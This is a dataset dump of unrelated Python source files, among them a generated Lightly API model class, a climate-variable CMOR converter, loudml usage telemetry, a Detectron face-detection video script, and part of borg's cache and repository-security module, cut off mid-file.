] | null | null | null | lightly/openapi_generated/swagger_client/models/update_docker_worker_registry_entry_request.py | CodeGuy-007/lightly | 64143fe8a477c04288009c65fa1265cef8aa48f8 | [
"MIT"
] | null | null | null | # coding: utf-8
"""
Lightly API
Lightly.ai enables you to do self-supervised learning in an easy and intuitive way. The lightly.ai OpenAPI spec defines how one can interact with our REST API to unleash the full potential of lightly.ai # noqa: E501
OpenAPI spec version: 1.0.0
Contact: support@lightly.ai
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from lightly.openapi_generated.swagger_client.configuration import Configuration
class UpdateDockerWorkerRegistryEntryRequest(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'state': 'DockerWorkerState'
}
attribute_map = {
'state': 'state'
}
def __init__(self, state=None, _configuration=None): # noqa: E501
"""UpdateDockerWorkerRegistryEntryRequest - a model defined in Swagger""" # noqa: E501
if _configuration is None:
_configuration = Configuration()
self._configuration = _configuration
self._state = None
self.discriminator = None
self.state = state
@property
def state(self):
"""Gets the state of this UpdateDockerWorkerRegistryEntryRequest. # noqa: E501
:return: The state of this UpdateDockerWorkerRegistryEntryRequest. # noqa: E501
:rtype: DockerWorkerState
"""
return self._state
@state.setter
def state(self, state):
"""Sets the state of this UpdateDockerWorkerRegistryEntryRequest.
:param state: The state of this UpdateDockerWorkerRegistryEntryRequest. # noqa: E501
:type: DockerWorkerState
"""
if self._configuration.client_side_validation and state is None:
raise ValueError("Invalid value for `state`, must not be `None`") # noqa: E501
self._state = state
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(UpdateDockerWorkerRegistryEntryRequest, dict):
for key, value in self.items():
result[key] = value
return result
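# Minimal usage sketch for this generated model (assumption: `some_docker_worker_state` is an
# instance/value of the generated DockerWorkerState model defined by the API spec):
#   req = UpdateDockerWorkerRegistryEntryRequest(state=some_docker_worker_state)
#   payload = req.to_dict()   # e.g. {'state': ...}, suitable as the request body for the API client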
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, UpdateDockerWorkerRegistryEntryRequest):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, UpdateDockerWorkerRegistryEntryRequest):
return True
return self.to_dict() != other.to_dict()
| 31.16 | 220 | 0.607445 |
1b9e7c787563446417d53dd66b47ca6c4dcc784e | 1,987 | py | Python | e3sm_to_cmip/cmor_handlers/dryso4.py | JGCRI/e3sm_to_cmip | 3d3bc7dd7e3a46a97dba4f13a888758e01ef4797 | [
"MIT"
] | null | null | null | e3sm_to_cmip/cmor_handlers/dryso4.py | JGCRI/e3sm_to_cmip | 3d3bc7dd7e3a46a97dba4f13a888758e01ef4797 | [
"MIT"
] | null | null | null | e3sm_to_cmip/cmor_handlers/dryso4.py | JGCRI/e3sm_to_cmip | 3d3bc7dd7e3a46a97dba4f13a888758e01ef4797 | [
"MIT"
] | null | null | null | """
so4_a1DDF + so4_a2DDF + so4_a3DDF + so4_c1DDF + so4_c2DDF + so4_c3DDF to dryso4 converter
"""
from __future__ import absolute_import, division, print_function, unicode_literals
import cmor
from e3sm_to_cmip.lib import handle_variables
# list of raw variable names needed
RAW_VARIABLES = [str('so4_a1DDF'), str('so4_a2DDF'), str('so4_a3DDF'), str('so4_c1DDF'), str('so4_c2DDF'), str('so4_c3DDF')]
VAR_NAME = str('dryso4')
VAR_UNITS = str('kg m-2 s-1')
TABLE = str('CMIP6_AERmon.json')
def write_data(varid, data, timeval, timebnds, index, **kwargs):
"""
dryso4 = so4_a1DDF + so4_a2DDF + so4_a3DDF + so4_c1DDF + so4_c2DDF + so4_c3DDF
"""
outdata = data['so4_a1DDF'][index, :] + data['so4_a2DDF'][index, :] + data['so4_a3DDF'][index, :] + \
data['so4_c1DDF'][index, :] + data['so4_c2DDF'][index, :] + data['so4_c3DDF'][index, :]
if kwargs.get('simple'):
return outdata
cmor.write(
varid,
outdata,
time_vals=timeval,
time_bnds=timebnds)
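# Note (not in the original source): the output is simply the sum of the six dry deposition
# fluxes listed in RAW_VARIABLES; assuming the usual MAM naming convention, the `so4_a*`
# fields are interstitial-aerosol modes and `so4_c*` the cloud-borne counterparts, with the
# DDF suffix marking the dry deposition flux diagnostic.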
# ------------------------------------------------------------------
def handle(infiles, tables, user_input_path, **kwargs):
"""
Parameters
----------
infiles (List): a list of strings of file names for the raw input data
tables (str): path to CMOR tables
user_input_path (str): path to user input json file
Returns
-------
var name (str): the name of the processed variable after processing is complete
"""
return handle_variables(
metadata_path=user_input_path,
tables=tables,
table=kwargs.get('table', TABLE),
infiles=infiles,
raw_variables=RAW_VARIABLES,
write_data=write_data,
outvar_name=VAR_NAME,
outvar_units=VAR_UNITS,
serial=kwargs.get('serial'),
logdir=kwargs.get('logdir'),
simple=kwargs.get('simple'),
outpath=kwargs.get('outpath'))
# ------------------------------------------------------------------
| 34.258621 | 124 | 0.598893 |
8f939dfe72bfd835138ef6558782b49ed85b6ae5 | 1,975 | py | Python | loudml/metrics.py | toni-moreno/loudml | 0252b6792393fc46f2dc9c1da25dd89fc27a5fa4 | [
"Apache-2.0"
] | 245 | 2018-01-30T08:11:53.000Z | 2022-03-26T07:17:42.000Z | loudml/metrics.py | robcowart/loudml | 0008baef02259a8ae81dd210d3f91a51ffc9ed9f | [
"Apache-2.0"
] | 620 | 2018-01-28T22:58:24.000Z | 2022-03-13T13:40:42.000Z | loudml/metrics.py | robcowart/loudml | 0008baef02259a8ae81dd210d3f91a51ffc9ed9f | [
"Apache-2.0"
] | 97 | 2018-03-06T14:44:26.000Z | 2022-03-24T01:57:31.000Z | """
Collect and send metrics about program usage
"""
from configparser import (
ConfigParser, NoSectionError
)
import io
import pkg_resources
import requests
from loudml.misc import my_host_id
# Workaround for ConfigParser requiring sections
# https://mail.python.org/pipermail/python-dev/2002-November/029987.html
class MyConfigParser(ConfigParser):
def read(self, filename):
try:
text = open(filename).read()
except IOError:
pass
else:
file = io.StringIO("[os-release]\n" + text)
self.readfp(file, filename)
def safe_get(self, section, val):
# Issue #208: /etc/os-release not always present
# On macOS it is: /System/Library/CoreServices/SystemVersion.plist
# TODO: consider more granular OS release extraction
try:
return self.get(section, val)
except NoSectionError:
return "N/A"
def send_metrics(config, storage, user_agent="loudmld"):
"""
Send usage information to telemetry server
:param config: telemetry configuration
:type config: dict
:param storage: storage backend
:type storage: loudml.Storage
:param user_agent: HTTP request user agent
:type user_agent: str
"""
if not config['enable']:
return
os_release = MyConfigParser()
os_release.read("/etc/os-release")
url = 'http://telemetry.loudml.io/api'
data = {
'host_id': my_host_id(),
'loudml': {
'distribution': os_release.safe_get("os-release", "NAME"),
'nr_models': len(storage.list_models()),
'version': pkg_resources.get_distribution("loudml").version,
},
}
headers = {
'user-agent': user_agent,
}
try:
requests.post(url, json=data, headers=headers)
except Exception:
# Ignore error as it may be expected in some environments (offline...)
pass
| 27.430556 | 78 | 0.623291 |
135cb746715061e52959abefe5188ce35acbd47e | 357 | py | Python | ia870/ialastero.py | bfoe/e2dhipseg | 4f6cbfd77bde2f92835c7007a230c08829f1845a | [
"MIT"
] | 4 | 2020-07-31T02:35:21.000Z | 2021-07-29T23:03:39.000Z | ia870/ialastero.py | Abigale-Xin/e2dhipseg | 520366326cd20c75b5db855c9dd05cf0a8d49089 | [
"MIT"
] | 2 | 2020-07-28T22:29:54.000Z | 2021-07-07T20:37:25.000Z | ia870/ialastero.py | Abigale-Xin/e2dhipseg | 520366326cd20c75b5db855c9dd05cf0a8d49089 | [
"MIT"
] | 7 | 2020-07-27T05:22:03.000Z | 2022-03-10T06:29:21.000Z | # -*- encoding: utf-8 -*-
# Module ialastero
from numpy import *
from ia870.iasecross import iasecross
def ialastero(f, B=iasecross()):
from iaisbinary import iaisbinary
from iadist import iadist
from iaregmax import iaregmax
assert iaisbinary(f),'Can only process binary images'
dt = iadist(f,B)
y = iaregmax(dt,B)
return y
| 21 | 57 | 0.694678 |
412ac433c0496276da3d33aabeca3bc6fc8d0c12 | 9,210 | py | Python | tools/face/detect_video.py | AruniRC/detectron-self-train | a5d0edc51aeab92b953948ef2401294e87efb719 | [
"MIT"
] | 128 | 2019-04-12T17:06:27.000Z | 2022-02-26T10:24:43.000Z | tools/face/detect_video.py | AruniRC/detectron-self-train | a5d0edc51aeab92b953948ef2401294e87efb719 | [
"MIT"
] | 15 | 2019-06-12T03:55:48.000Z | 2021-03-12T07:09:53.000Z | tools/face/detect_video.py | AruniRC/detectron-self-train | a5d0edc51aeab92b953948ef2401294e87efb719 | [
"MIT"
] | 24 | 2019-04-12T17:06:30.000Z | 2021-07-12T12:38:20.000Z | #!/usr/bin/env python3
"""
Perform inference on frames from a video using Detectron saved checkpoint.
A symlink 'data/CS6' should point to the CS6 data root location
(on Gypsum this is in /mnt/nfs/scratch1/arunirc/data/CS6/CS6/CS6.0.01/CS6).
Usage (on slurm cluster):
srun --pty --mem 100000 --gres gpu:1 python tools/face/detect_video.py \
--vis --video_name 3004.mp4
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import distutils.util
import os
import sys
import pprint
import subprocess
from collections import defaultdict
from six.moves import xrange
import os.path as osp
import time
# Use a non-interactive backend
import matplotlib
matplotlib.use('Agg')
import numpy as np
import cv2
import skvideo
import skvideo.io
import torch
import torch.nn as nn
from torch.autograd import Variable
import sys
sys.path.append('./tools')
import _init_paths
import nn as mynn
from core.config import cfg, cfg_from_file, cfg_from_list, assert_and_infer_cfg
from core.test import im_detect_bbox
from modeling.model_builder import Generalized_RCNN
import datasets.dummy_datasets as datasets
import utils.boxes as box_utils # for NMS
import utils.misc as misc_utils
import utils.net as net_utils
import utils.vis as vis_utils
import utils.face_utils as face_utils
from utils.detectron_weight_helper import load_detectron_weight
# from utils.timer import Timer
# ---------------------------------------------------------------------------- #
# Change quick settings here:
# ---------------------------------------------------------------------------- #
# Baseline: trained on WIDER Face
# DET_NAME = 'frcnn-R-50-C4-1x'
# CFG_PATH = 'configs/wider_face/e2e_faster_rcnn_R-50-C4_1x.yaml'
# WT_PATH = 'Outputs/e2e_faster_rcnn_R-50-C4_1x/Jul30-15-51-27_node097_step/ckpt/model_step79999.pth'
# TRAIN_DATA = 'WIDER'
# CONF_THRESH = 0.25
CONF_THRESH = 0.1
NMS_THRESH = 0.15
## --- CS6 + WIDER Joint training [distill branch] ---
DET_NAME = 'frcnn-R-50-C4-1x'
TRAIN_IMDB = 'CS6-train-HP+WIDER-da-im_5k'
CFG_PATH = 'configs/cs6/e2e_faster_rcnn_R-50-C4_1x_domain_im.yaml'
WT_PATH = 'Outputs/e2e_faster_rcnn_R-50-C4_1x_domain_im/Oct06-23-57-55_node119_step/ckpt/model_step4999.pth'
OUT_DIR = 'Outputs/evaluations/%s/cs6/train-%s_val-easy_conf-%.2f' % (
DET_NAME, TRAIN_IMDB, CONF_THRESH)
VID_NAME = '600.mp4'
DATA_DIR = 'data/CS6'
# ---
def parse_args():
parser = argparse.ArgumentParser(description='Detectron inference on video')
parser.add_argument(
'--exp_name',
help='detector name',
default=DET_NAME
)
parser.add_argument(
'--cfg',
dest='cfg_file',
help='cfg model file (/path/to/model_prototxt)',
default=CFG_PATH,
type=str
)
parser.add_argument(
'--load_ckpt',
help='checkpoints weights model file (/path/to/model_weights.pkl)',
default=WT_PATH,
type=str
)
parser.add_argument(
'--load_detectron', help='path to the detectron weight pickle file'
)
parser.add_argument(
'--output-dir',
dest='output_dir',
help='directory for visualization pdfs (default: /tmp/infer_simple)',
default=OUT_DIR,
type=str
)
parser.add_argument(
'--no_cuda', dest='cuda', help='whether use CUDA',
action='store_false'
)
parser.add_argument(
'--thresh',
dest='thresh',
        help='Threshold on class score',
default=CONF_THRESH,
type=float
)
parser.add_argument(
'--vis',
dest='vis',
help='Visualize detections on video frames option',
action='store_true',
default=False
)
# parser.add_argument(
# '--save_frame',
# dest='save_frame',
# help='Save the video frames that have detections',
# action='store_true',
# default=False
# )
parser.add_argument(
'--data_dir', help='Path to video file', default=DATA_DIR
)
parser.add_argument(
'--video_name', help='Name of video file', default=VID_NAME
)
return parser.parse_args()
_GREEN = (18, 127, 15)
# ------------------------------------------------------------------------------
def draw_detection_list(im, dets):
# ------------------------------------------------------------------------------
""" Draw detected bounding boxes on a copy of image and return it.
[x0 y0 w h conf_score]
"""
im_det = im.copy()
if dets.ndim == 1:
dets = dets[np.newaxis,:] # handle single detection case
# format into [xmin, ymin, xmax, ymax]
dets[:, 2] = dets[:, 2] + dets[:, 0]
dets[:, 3] = dets[:, 3] + dets[:, 1]
for i, det in enumerate(dets):
bbox = dets[i, :4]
conf_score = dets[i, 4]
x0, y0, x1, y1 = [int(x) for x in bbox]
line_color = _GREEN
cv2.rectangle(im_det, (x0, y0), (x1, y1), line_color, thickness=2)
disp_str = '%d: %.2f' % (i, conf_score)
face_utils._draw_string(im_det, (x0, y0), disp_str)
return im_det
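# Example input for draw_detection_list (illustrative values): `dets` is an
# N x 5 float array of [x0, y0, w, h, conf_score] rows, e.g.
#     dets = np.array([[10., 20., 50., 80., 0.93]])
# each box is converted to corner format and drawn with its index and score.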
if __name__ == '__main__':
if not torch.cuda.is_available():
sys.exit("Need a CUDA device to run the code.")
args = parse_args()
# args.output_dir = args.output_dir % args.exp_name
print('Called with args:')
print(args)
# Model setup
cfg.TEST.SCALE = 800
cfg.TEST.MAX_SIZE = 1333
cfg.MODEL.NUM_CLASSES = 2
cfg.TEST.NMS = NMS_THRESH
print('load cfg from file: {}'.format(args.cfg_file))
cfg_from_file(args.cfg_file)
assert bool(args.load_ckpt) ^ bool(args.load_detectron), \
'Exactly one of --load_ckpt and --load_detectron should be specified.'
cfg.MODEL.LOAD_IMAGENET_PRETRAINED_WEIGHTS = False
assert_and_infer_cfg()
net = Generalized_RCNN()
if args.cuda:
net.cuda()
if args.load_ckpt:
load_name = args.load_ckpt
print("loading checkpoint %s" % (load_name))
checkpoint = torch.load(load_name, map_location=lambda storage, loc: storage)
net_utils.load_ckpt(net, checkpoint['model'])
if args.load_detectron:
print("loading detectron weights %s" % args.load_detectron)
load_detectron_weight(net, args.load_detectron)
net = mynn.DataParallel(net, cpu_keywords=['im_info', 'roidb'],
minibatch=True, device_ids=[0]) # only support single GPU
net.eval()
# Data setup
video_path = osp.join(args.data_dir, 'videos', args.video_name)
if osp.exists(video_path):
videogen = skvideo.io.vreader(video_path)
else:
raise IOError('Path to video not found: \n%s' % video_path)
vid_name = osp.basename(video_path).split('.')[0]
if not osp.exists(args.output_dir):
os.makedirs(args.output_dir, exist_ok=True)
if args.vis:
img_output_dir = osp.join(args.output_dir, vid_name)
if not osp.exists(img_output_dir):
os.makedirs(img_output_dir, exist_ok=True)
# Detect faces on video frames
start = time.time()
with open(os.path.join(args.output_dir, vid_name + '.txt'), 'w') as fid:
det_list = []
for i, im in enumerate(videogen):
im_name = '%s_%08d' % (vid_name, i)
print(im_name)
im = im[:,:,(2,1,0)] # RGB --> BGR
# Detect faces and regress bounding-boxes
scores, boxes, im_scale, blob_conv = im_detect_bbox(
net, im, cfg.TEST.SCALE, cfg.TEST.MAX_SIZE)
cls_ind = 1
cls_boxes = boxes[:, 4*cls_ind:4*(cls_ind + 1)]
cls_scores = scores[:, cls_ind]
dets = np.hstack((cls_boxes,
cls_scores[:, np.newaxis])).astype(np.float32)
keep = box_utils.nms(dets, NMS_THRESH)
dets = dets[keep, :]
keep = np.where(dets[:, 4] > args.thresh)
dets = dets[keep]
# (x, y, w, h)
dets[:, 2] = dets[:, 2] - dets[:, 0] + 1
dets[:, 3] = dets[:, 3] - dets[:, 1] + 1
# Saving visualized frames
if args.vis:
viz_out_path = osp.join(img_output_dir, im_name + '.jpg')
if dets.size == 0: # nothing detected
if args.vis:
cv2.imwrite(viz_out_path, im)
else:
if args.vis:
im_det = draw_detection_list( im, dets.copy() )
cv2.imwrite(viz_out_path, im_det)
# Writing to text file
fid.write(im_name + '\n')
fid.write(str(dets.shape[0]) + '\n')
for j in xrange(dets.shape[0]):
fid.write('%f %f %f %f %f\n' % ( dets[j, 0], dets[j, 1],
dets[j, 2], dets[j, 3],
dets[j, 4]) )
# if ((i + 1) % 100) == 0:
# sys.stdout.write('%d ' % i)
# sys.stdout.flush()
end = time.time()
print('Execution time in seconds: %f' % (end - start))
| 30.39604 | 108 | 0.588274 |
3559e7c4ea30edd3eb10524698d9bf472150f4fb | 617 | py | Python | db/migrations/0010_language.py | matchd-ch/matchd-backend | 84be4aab1b4708cae50a8988301b15df877c8db0 | [
"Apache-2.0"
] | 1 | 2022-03-03T09:55:57.000Z | 2022-03-03T09:55:57.000Z | db/migrations/0010_language.py | matchd-ch/matchd-backend | 84be4aab1b4708cae50a8988301b15df877c8db0 | [
"Apache-2.0"
] | 7 | 2022-02-09T10:44:53.000Z | 2022-03-28T03:29:43.000Z | db/migrations/0010_language.py | matchd-ch/matchd-backend | 84be4aab1b4708cae50a8988301b15df877c8db0 | [
"Apache-2.0"
] | null | null | null | # Generated by Django 3.1.5 on 2021-02-03 10:00
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('db', '0009_skill'),
]
operations = [
migrations.CreateModel(
name='Language',
fields=[
('id',
models.AutoField(auto_created=True,
primary_key=True,
serialize=False,
verbose_name='ID')),
('name', models.CharField(max_length=255)),
],
),
]
| 24.68 | 59 | 0.45705 |
a0d8ebfdb6ad8323ad48626bc5b462508a9c4c2c | 489 | py | Python | api/idea_party/ideas/migrations/0004_auto_20200729_1520.py | nilq/idea-party | 08895399b72a6e735a2a6518feb205619c592ffe | [
"MIT"
] | null | null | null | api/idea_party/ideas/migrations/0004_auto_20200729_1520.py | nilq/idea-party | 08895399b72a6e735a2a6518feb205619c592ffe | [
"MIT"
] | null | null | null | api/idea_party/ideas/migrations/0004_auto_20200729_1520.py | nilq/idea-party | 08895399b72a6e735a2a6518feb205619c592ffe | [
"MIT"
] | null | null | null | # Generated by Django 3.0.8 on 2020-07-29 15:20
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('ideas', '0003_auto_20200729_1512'),
]
operations = [
migrations.AlterField(
model_name='idea',
name='parent',
field=models.ForeignKey(blank=True, default=None, on_delete=django.db.models.deletion.CASCADE, to='ideas.Idea'),
),
]
| 24.45 | 124 | 0.640082 |
dd3f1f196338485d5354da4f5ce2a19fdf578841 | 52,300 | py | Python | src/borg/cache.py | akozlins/borg | e4438227c1d235f1b631d400eebc22e11bb09e89 | [
"BSD-3-Clause"
] | null | null | null | src/borg/cache.py | akozlins/borg | e4438227c1d235f1b631d400eebc22e11bb09e89 | [
"BSD-3-Clause"
] | null | null | null | src/borg/cache.py | akozlins/borg | e4438227c1d235f1b631d400eebc22e11bb09e89 | [
"BSD-3-Clause"
] | null | null | null | import configparser
import os
import shutil
import stat
from binascii import unhexlify
from collections import namedtuple
from time import perf_counter
from .logger import create_logger
logger = create_logger()
from .constants import CACHE_README, DEFAULT_FILES_CACHE_MODE
from .hashindex import ChunkIndex, ChunkIndexEntry, CacheSynchronizer
from .helpers import Location
from .helpers import Error
from .helpers import Manifest
from .helpers import get_cache_dir, get_security_dir
from .helpers import int_to_bigint, bigint_to_int, bin_to_hex, parse_stringified_list
from .helpers import format_file_size
from .helpers import safe_ns
from .helpers import yes
from .helpers import remove_surrogates
from .helpers import ProgressIndicatorPercent, ProgressIndicatorMessage
from .helpers import set_ec, EXIT_WARNING
from .helpers import truncate_and_unlink
from .helpers import msgpack
from .item import ArchiveItem, ChunkListEntry
from .crypto.key import PlaintextKey
from .crypto.file_integrity import IntegrityCheckedFile, DetachedIntegrityCheckedFile, FileIntegrityError
from .locking import Lock
from .platform import SaveFile
from .remote import cache_if_remote
from .repository import LIST_SCAN_LIMIT
# note: cmtime might be either a ctime or an mtime timestamp
FileCacheEntry = namedtuple('FileCacheEntry', 'age inode size cmtime chunk_ids')
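# Illustrative FileCacheEntry (made-up values; see memorize_file() below for how
# real entries are built):
#     FileCacheEntry(age=0, inode=123456, size=4096,
#                    cmtime=int_to_bigint(1500000000000000000),
#                    chunk_ids=[chunk_id_1, chunk_id_2])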
class SecurityManager:
"""
Tracks repositories. Ensures that nothing bad happens (repository swaps,
replay attacks, unknown repositories etc.).
This is complicated by the Cache being initially used for this, while
only some commands actually use the Cache, which meant that other commands
did not perform these checks.
Further complications were created by the Cache being a cache, so it
could be legitimately deleted, which is annoying because Borg didn't
recognize repositories after that.
Therefore a second location, the security database (see get_security_dir),
was introduced which stores this information. However, this means that
the code has to deal with a cache existing but no security DB entry,
or inconsistencies between the security DB and the cache which have to
be reconciled, and also with no cache existing but a security DB entry.
"""
def __init__(self, repository):
self.repository = repository
self.dir = get_security_dir(repository.id_str)
self.cache_dir = cache_dir(repository)
self.key_type_file = os.path.join(self.dir, 'key-type')
self.location_file = os.path.join(self.dir, 'location')
self.manifest_ts_file = os.path.join(self.dir, 'manifest-timestamp')
@staticmethod
def destroy(repository, path=None):
"""destroy the security dir for ``repository`` or at ``path``"""
path = path or get_security_dir(repository.id_str)
if os.path.exists(path):
shutil.rmtree(path)
def known(self):
return os.path.exists(self.key_type_file)
def key_matches(self, key):
if not self.known():
return False
try:
with open(self.key_type_file, 'r') as fd:
type = fd.read()
return type == str(key.TYPE)
except OSError as exc:
logger.warning('Could not read/parse key type file: %s', exc)
def save(self, manifest, key):
logger.debug('security: saving state for %s to %s', self.repository.id_str, self.dir)
current_location = self.repository._location.canonical_path()
logger.debug('security: current location %s', current_location)
logger.debug('security: key type %s', str(key.TYPE))
logger.debug('security: manifest timestamp %s', manifest.timestamp)
with SaveFile(self.location_file) as fd:
fd.write(current_location)
with SaveFile(self.key_type_file) as fd:
fd.write(str(key.TYPE))
with SaveFile(self.manifest_ts_file) as fd:
fd.write(manifest.timestamp)
def assert_location_matches(self, cache_config=None):
# Warn user before sending data to a relocated repository
try:
with open(self.location_file) as fd:
previous_location = fd.read()
logger.debug('security: read previous location %r', previous_location)
except FileNotFoundError:
logger.debug('security: previous location file %s not found', self.location_file)
previous_location = None
except OSError as exc:
logger.warning('Could not read previous location file: %s', exc)
previous_location = None
if cache_config and cache_config.previous_location and previous_location != cache_config.previous_location:
# Reconcile cache and security dir; we take the cache location.
previous_location = cache_config.previous_location
logger.debug('security: using previous_location of cache: %r', previous_location)
repository_location = self.repository._location.canonical_path()
if previous_location and previous_location != repository_location:
msg = ("Warning: The repository at location {} was previously located at {}\n".format(
repository_location, previous_location) +
"Do you want to continue? [yN] ")
if not yes(msg, false_msg="Aborting.", invalid_msg="Invalid answer, aborting.",
retry=False, env_var_override='BORG_RELOCATED_REPO_ACCESS_IS_OK'):
raise Cache.RepositoryAccessAborted()
# adapt on-disk config immediately if the new location was accepted
logger.debug('security: updating location stored in cache and security dir')
with SaveFile(self.location_file) as fd:
fd.write(repository_location)
if cache_config:
cache_config.save()
def assert_no_manifest_replay(self, manifest, key, cache_config=None):
try:
with open(self.manifest_ts_file) as fd:
timestamp = fd.read()
logger.debug('security: read manifest timestamp %r', timestamp)
except FileNotFoundError:
logger.debug('security: manifest timestamp file %s not found', self.manifest_ts_file)
timestamp = ''
except OSError as exc:
logger.warning('Could not read previous location file: %s', exc)
timestamp = ''
if cache_config:
timestamp = max(timestamp, cache_config.timestamp or '')
logger.debug('security: determined newest manifest timestamp as %s', timestamp)
# If repository is older than the cache or security dir something fishy is going on
if timestamp and timestamp > manifest.timestamp:
if isinstance(key, PlaintextKey):
raise Cache.RepositoryIDNotUnique()
else:
raise Cache.RepositoryReplay()
def assert_key_type(self, key, cache_config=None):
# Make sure an encrypted repository has not been swapped for an unencrypted repository
if cache_config and cache_config.key_type is not None and cache_config.key_type != str(key.TYPE):
raise Cache.EncryptionMethodMismatch()
if self.known() and not self.key_matches(key):
raise Cache.EncryptionMethodMismatch()
def assert_secure(self, manifest, key, *, cache_config=None, warn_if_unencrypted=True, lock_wait=None):
# warn_if_unencrypted=False is only used for initializing a new repository.
# Thus, avoiding asking about a repository that's currently initializing.
self.assert_access_unknown(warn_if_unencrypted, manifest, key)
if cache_config:
self._assert_secure(manifest, key, cache_config)
else:
cache_config = CacheConfig(self.repository, lock_wait=lock_wait)
if cache_config.exists():
with cache_config:
self._assert_secure(manifest, key, cache_config)
else:
self._assert_secure(manifest, key)
logger.debug('security: repository checks ok, allowing access')
def _assert_secure(self, manifest, key, cache_config=None):
self.assert_location_matches(cache_config)
self.assert_key_type(key, cache_config)
self.assert_no_manifest_replay(manifest, key, cache_config)
if not self.known():
logger.debug('security: remembering previously unknown repository')
self.save(manifest, key)
def assert_access_unknown(self, warn_if_unencrypted, manifest, key):
# warn_if_unencrypted=False is only used for initializing a new repository.
# Thus, avoiding asking about a repository that's currently initializing.
if not key.logically_encrypted and not self.known():
msg = ("Warning: Attempting to access a previously unknown unencrypted repository!\n" +
"Do you want to continue? [yN] ")
allow_access = not warn_if_unencrypted or yes(msg, false_msg="Aborting.",
invalid_msg="Invalid answer, aborting.",
retry=False, env_var_override='BORG_UNKNOWN_UNENCRYPTED_REPO_ACCESS_IS_OK')
if allow_access:
if warn_if_unencrypted:
logger.debug('security: remembering unknown unencrypted repository (explicitly allowed)')
else:
logger.debug('security: initializing unencrypted repository')
self.save(manifest, key)
else:
raise Cache.CacheInitAbortedError()
def assert_secure(repository, manifest, lock_wait):
sm = SecurityManager(repository)
sm.assert_secure(manifest, manifest.key, lock_wait=lock_wait)
def recanonicalize_relative_location(cache_location, repository):
# borg < 1.0.8rc1 had different canonicalization for the repo location (see #1655 and #1741).
repo_location = repository._location.canonical_path()
rl = Location(repo_location)
cl = Location(cache_location)
if cl.proto == rl.proto and cl.user == rl.user and cl.host == rl.host and cl.port == rl.port \
and \
cl.path and rl.path and \
cl.path.startswith('/~/') and rl.path.startswith('/./') and cl.path[3:] == rl.path[3:]:
# everything is same except the expected change in relative path canonicalization,
# update previous_location to avoid warning / user query about changed location:
return repo_location
else:
return cache_location
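    # Illustrative case for the check above: a cached location whose path part is
    # '/~/backup' (old canonicalization) and a current repository location whose
    # path part is '/./backup' (new canonicalization) are treated as the same
    # repository, so no relocation warning is raised.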
def cache_dir(repository, path=None):
return path or os.path.join(get_cache_dir(), repository.id_str)
class CacheConfig:
def __init__(self, repository, path=None, lock_wait=None):
self.repository = repository
self.path = cache_dir(repository, path)
self.config_path = os.path.join(self.path, 'config')
self.lock = None
self.lock_wait = lock_wait
def __enter__(self):
self.open()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
def exists(self):
return os.path.exists(self.config_path)
def create(self):
assert not self.exists()
config = configparser.ConfigParser(interpolation=None)
config.add_section('cache')
config.set('cache', 'version', '1')
config.set('cache', 'repository', self.repository.id_str)
config.set('cache', 'manifest', '')
config.add_section('integrity')
config.set('integrity', 'manifest', '')
with SaveFile(self.config_path) as fd:
config.write(fd)
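    # create() above writes a plain INI file; its initial content is roughly
    # (illustrative):
    #     [cache]
    #     version = 1
    #     repository = <repository id hex>
    #     manifest =
    #     [integrity]
    #     manifest =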
def open(self):
self.lock = Lock(os.path.join(self.path, 'lock'), exclusive=True, timeout=self.lock_wait).acquire()
self.load()
def load(self):
self._config = configparser.ConfigParser(interpolation=None)
with open(self.config_path) as fd:
self._config.read_file(fd)
self._check_upgrade(self.config_path)
self.id = self._config.get('cache', 'repository')
self.manifest_id = unhexlify(self._config.get('cache', 'manifest'))
self.timestamp = self._config.get('cache', 'timestamp', fallback=None)
self.key_type = self._config.get('cache', 'key_type', fallback=None)
self.ignored_features = set(parse_stringified_list(self._config.get('cache', 'ignored_features', fallback='')))
self.mandatory_features = set(parse_stringified_list(self._config.get('cache', 'mandatory_features', fallback='')))
try:
self.integrity = dict(self._config.items('integrity'))
if self._config.get('cache', 'manifest') != self.integrity.pop('manifest'):
# The cache config file is updated (parsed with ConfigParser, the state of the ConfigParser
# is modified and then written out.), not re-created.
# Thus, older versions will leave our [integrity] section alone, making the section's data invalid.
# Therefore, we also add the manifest ID to this section and
# can discern whether an older version interfered by comparing the manifest IDs of this section
# and the main [cache] section.
self.integrity = {}
logger.warning('Cache integrity data not available: old Borg version modified the cache.')
except configparser.NoSectionError:
logger.debug('Cache integrity: No integrity data found (files, chunks). Cache is from old version.')
self.integrity = {}
previous_location = self._config.get('cache', 'previous_location', fallback=None)
if previous_location:
self.previous_location = recanonicalize_relative_location(previous_location, self.repository)
else:
self.previous_location = None
self._config.set('cache', 'previous_location', self.repository._location.canonical_path())
def save(self, manifest=None, key=None):
if manifest:
self._config.set('cache', 'manifest', manifest.id_str)
self._config.set('cache', 'timestamp', manifest.timestamp)
self._config.set('cache', 'ignored_features', ','.join(self.ignored_features))
self._config.set('cache', 'mandatory_features', ','.join(self.mandatory_features))
if not self._config.has_section('integrity'):
self._config.add_section('integrity')
for file, integrity_data in self.integrity.items():
self._config.set('integrity', file, integrity_data)
self._config.set('integrity', 'manifest', manifest.id_str)
if key:
self._config.set('cache', 'key_type', str(key.TYPE))
with SaveFile(self.config_path) as fd:
self._config.write(fd)
def close(self):
